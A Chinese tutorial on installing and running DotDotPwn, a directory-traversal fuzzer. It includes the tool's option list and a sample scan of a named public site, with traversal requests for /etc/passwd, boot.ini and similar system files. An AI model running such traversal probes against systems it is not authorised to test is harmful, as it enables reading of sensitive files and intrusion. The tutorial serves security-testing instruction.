目录遍历工具DotDotPwn安装使用
1. DotDotPwn介绍
DotDotPwn是一个模糊测试工具,用于发现软件中的遍历目录漏洞,例如HTTP/FTP/TFTP服务器,Web平台的应用程序(如CMS,ERP,博客等)。
DotDotPwn是用perl编程语言编写的,可以在LNIX或Windows平台下运行。
2. DotDotPwn安装
1.需要perl环境,有的系统自带,可使用perl -v查看,若没有直接到官网下载安装:
https://www.perl.org/get.html
2. 下载工具:https://github.com/wireghoul/dotdotpwn
3. 解压:unzip dotdotpwn_master.zip
4. 进入解压后的目录:cd dotdotpwn_master
5. 查看用法:./dotdotpwn.pl
./dotdotpwn.pl
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0.2 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]Available options:-m Module [http | http-url | ftp | tftp | payload | stdout]-h Hostname-O Operating System detection for intelligent fuzzing (nmap)-o Operating System type if known ("windows", "unix" or "generic")-s Service version detection (banner grabber)-d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)-f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)-E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)-S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)-u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)-k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)-p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword-x Port to connect (default: HTTP=80; FTP=21; TFTP=69)-t Time in milliseconds between each test (default: 300 (.3 second))-X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found-e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")-U Username (default: 'anonymous')-P Password (default: 'dot@dot.pwn')-M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)-r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')-b Break after the first vulnerability is found-q Quiet mode (doesn't print each attempt)-C Continue if no data was received from host
3. DotDotPwn使用
输入:./dotdotpwn.pl -m http -O -s -S -h www.example.com
连接完成后会出现开始遍历的提示,点击enter开始扫描即可:
root@kali:~# dotdotpwn -m http -O -s -S -h www.hackfun.org
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/www.hackfun.org_10-23-2016_23-42.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: www.hackfun.org
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:
[+] Protocol: http
[+] Port: 443
[+] Service detected:
nginx
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 19680
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../windows/system32/drivers/etc/hosts
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/passwd
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../etc/issue
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../boot.ini
[*] HTTP Status: 400 | Testing Path: https://www.hackfun.org:443/../../../../../../windows/system32/drivers/etc/hosts
————————————————
版权声明:本文参考了CSDN博主「时光途径」的原创文章,遵循CC 4.0 BY-SA版权协议,附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/SHIGUANGTUJING/article/details/88959824
目录遍历工具DotDotPwn安装使用相关推荐
- DirBuster目录扫描工具下载安装和简单使用
参考资料<Web安全攻防 渗透测试实战指南> DirBuster是OWASP开发的,基于Java编写的,专门用于探测Web服务器的目录和隐藏文件的工具,需要在在JRE下安装. 一.准备JA ...
- dirsearch目录扫描工具
dirsearch目录扫描工具 kali安装pip3 kali安装dirsearch 开始扫描 kali安装pip3 wget https://bootstrap.pypa.io/pip/get-pi ...
- niagara在linux系统上的安装,TRIDIUM NiagaraAX目录遍历漏洞
发布日期:2013-02-14 更新日期:2013-03-01 受影响系统: TriDComm NiagaraAX 3.7 TriDComm NiagaraAX 3.6 TriDComm Niagar ...
- 靶机、软件搭建:05---Burp Suite工具的安装与使用(Windows环境)
一.Burp Suite简介 Burp Suite 是一款集成化的渗透测试工具,包含了很多功能,可以帮助我们高效地完成对Web应用程序的渗透测试和攻击 特点:Burp Suite由Java语言编写,基 ...
- ES6简介、新特性、Babel编译器、babel-cli工具、babel-polyfill工具(安装和使用)
目录 简介 ECMAScript 的历史 ES6新特性 1.语法方面 2.功能方面 Babel编译器 babel-cli工具 第一步:创建一个文件夹,名称为app,在vscode中打开终端,终端路 ...
- php post 漏洞_文件包含上传漏洞目录遍历命令执行漏洞
制丨阿星 来源丨freebuff 作者丨Deutsh 文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create ...
- web漏洞(CSRF-SSRF-文件包含-文件解释-文件下载-目录遍历-sql注入-文件上传-反序列化-XSS-XXE-RCE-逻辑越权)
1.CSRF(跨站请求伪造)(需要对方是在登录的情况下)--主要用于骗转账等等 原理:A在已经登录了银行的网站,并且此时去访问了B所构造的网页添加了特殊代码,A点击了B,由于A已经登录了,就造成了A直 ...
- 目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞
目录 目录浏览(目录遍历)漏洞 任意文件读取/下载漏洞 目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件 ...
- 目录遍历漏洞和任意文件下载漏洞
目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件.配置文件等,攻击者利用该信息可以为进一步入侵网站做准备 ...
最新文章
- 自律到极致-人生才精致「第3期」:中奖结果
- 03:Poor Herobrine 直接插入排序
- tomcat 显示访问的ip白名单
- 错误 未找到引用源_你不理解的EXCEL函数中常见的错误值,都在这里
- 计算机网络 | 应用层 :HTTP协议详解
- 妙用世界之窗浏览器的隐私保护功能
- celery4+django2定时任务
- mysql中like,limit,union及union all查询
- 使用excel绘制统计分布表(T分布表)
- 【RL】同策略(on-policy)与异策略(off-policy)
- practice之Python爬取今日头条图片(正则表达式)
- Linux——超超讲解SSH的原理与SSH的实现!建议收藏❤
- 中国金融科技50强之“百度金融”技术基因研究
- 哈希(hash)理解
- ThinkPad S5 升级安装Windows10后 连上网络后系统假死
- MySQL中常见的日志文件
- php相册管理插件,相册插件-ZBLOGPHP插件-鸟儿网络
- LeetCode7.10 股票问题汇总 贪心,动态规划,排序
- CUMTOJ算法作业二
- 帝国CMS2018年最新漏洞获取管理员密码